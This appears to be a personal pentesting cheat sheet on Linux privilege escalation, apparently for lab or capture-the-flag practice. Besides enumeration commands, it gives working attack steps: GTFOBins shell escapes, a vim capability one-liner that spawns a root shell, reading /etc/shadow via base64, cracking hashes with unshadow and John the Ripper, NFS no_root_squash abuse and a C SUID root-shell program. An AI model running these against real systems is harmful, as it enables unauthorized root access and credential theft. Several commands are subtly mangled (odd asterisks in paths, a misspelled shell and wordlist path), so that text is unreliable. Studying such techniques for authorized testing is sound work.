Contents
Enumeration
Make sure to look at the Exploit DB once system information has been gathered - Exploit-DB
Useful Commands
Some useful commands once access to a machine has been gained:
hostname - can provide some information about the target’s role within the organisationuname -a - provides information about the target’s system such as the kernal; useful for searching for vulnerabilitiescat /proc/version - provides information about the target’s operating system such as kernal version and compilers installed (e.g. GCC)cat /etc/issue - provides information about the target’s operating system such as the versionps - shows running processes on the target system. Useful flags include aux, axjf, -Aenv - shows environment variablessudo -l - shows sudo permissions for current userls -la - list all files and directories on the targetid - shows the user ID and group ID of the current usercat /etc/passwd - list all users on the target; better examples below:
1
| cat /etc/passwd | cut -d ":" -f 1
|
1
| cat /etc/passwd | grep home
|
history - command history, may have passwords or usernamesifconfig - network interfaces informationip route - network routing informationnetstat -a - all listening ports and established connectionsnetstat -at or -au - used to list TCP or UDP connections respectivelynetstat -l - lists all listening portsnetstat -s - shows statistics on network usagenetstat -l -p - list all listening ports and the processes using themnetstat -i - show network interface statisticsnetstat -ano - show all connections (-a), do not resolve names (-n), display timers (-o)find . -name flag1.txt - find all files with the name `flag1.txt in the current directoryfind /home -name flag1.txt - find all files with the name flag1.txt in /homefind / -type d -name config - find the directory named config in /find / -type f -perm 0o777 - find all files with permissions of 777find / -perm a=x - find all files that can be executedfind /home -user frank - find all files for user “frank” under /homefind / -mtime 10 - find files that were modified in the last 10 daysfind / -atime 10 - find files that were accessed in the last 10 daysfind / -cmin -60 - find files that were changed in the last 60 minutesfind / -amin -60 - find files that were accessed in the last 60 minutesfind / -size 50M - find files that are 50MB in size; can be used with + or - to specify files larger or smaller than the given sizefind / -size +100M -type f 2>/dev/null - find files that are 100MB or larger and remove errors form being displayed by using 2>/dev/nullfind / -writable -type d 2>/dev/null - find writable directoriesfind / -perm -222 -type d 2>/dev/null - find writable directoriesfind / -perm -o w -type d 2>/dev/null - find writable directoriesfind / -perm -o x -type d 2>/dev/null - find executable directoriesfind / -name perl*, find / -name python*, find / -name gcc* - find dev tools & supported languagesfind / -perm -u=s -type f 2>/dev/null - find files with suid bit set; allows to run the file with higher privilege level than the current user
Links to various enumeration tools that are well worth learning to use:
Get The Fuck Out Bins
GTFOBins - legitimate functions of Unix binaries to break out of restrictive shells, escalate or maintain elevated privileges, etc. Example of an awesome line that will grant sudo shell access:
1
| find . -exec /bin/sh \; -quit
|
Cat Alternative
Excellent way to cat a file if privilege does not allow use of cat; try base64 in the following way:
1
| base64 /etc/shadow | base64 -d
|
Check for SUID/GUID
Use the command below to see what files have the SUID or GUID bit set:
1
| find / -type f -perm -04000 -ls 2>/dev/null
|
Good practice is to compare the executables from the generated list with GTFOBins. Check for things like base64 and nano when cat returns permission denied.
Unshadow
Use the unshadow tool with John the Ripper to crack passwords from the /etc/shadow file and the /etc/passwd file.
1
| unshadow passwd.txt shadow.txt >passwords.txt
|
1
| john --wordlist=/usr/shares/wordlists/rockyou.txt passwords.txt
|
I have recently compared the performance of John the Ripper with Hashcat on my MBP. I cannot believe how damned fast Hashcat is compared to John. Whenever I can, in future I shall always be using Hashcat as a first choice. It blasted John out of the water. In one test it cracked a BCrypt hash in seconds compared to John taking what felt like a lifetime. If you’re a fan of John and have not really looked at Hashcat, I recommend you do.
Capabilities
Use of capabilities can be extremely useful for getting root privileges
1
| getcap -r / 2>/dev/null
|
The above command will show which executables have elevated capabilities. Use the list to check on GTFOBins for any binaries that may be vulnerable. Example for vim:
1
| ./vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
|
Find Writable Folders
When finding writable folders, the output can be very long. Use the following to tidy up the output:
1
| find / -writable 2>*dev/null | cut -d "*" -f 2 | sort -u
|
Followed by something like…
1
| find / -writable 2>*dev/null | grep usr | cut -d "*" -f 2,3 | sort -u
|
or
1
| find / -writable 2>*dev/null | cut -d "*" -f 2,3 | grep -v proc | sort -u
|
Path Env Variable
Add writable folders to the $PATH environment variable:
1
| export PATH=$PATH:*home*<user>
|
or
Enumerate mountable network shares
1
| showmount -e <target_ip>
|
- Choose a “no_root_squash” folder to mount to from a temp folder:
1
| mount -o rw /tmp/temp <target_ip >:/tmp
|
Create and Compile
Create and compile an executable and then set the SUID bit
1
2
3
4
5
6
| int main()
{ setgid(0);
setuid(0);
system("/bin/bssh");
return 0;
}
|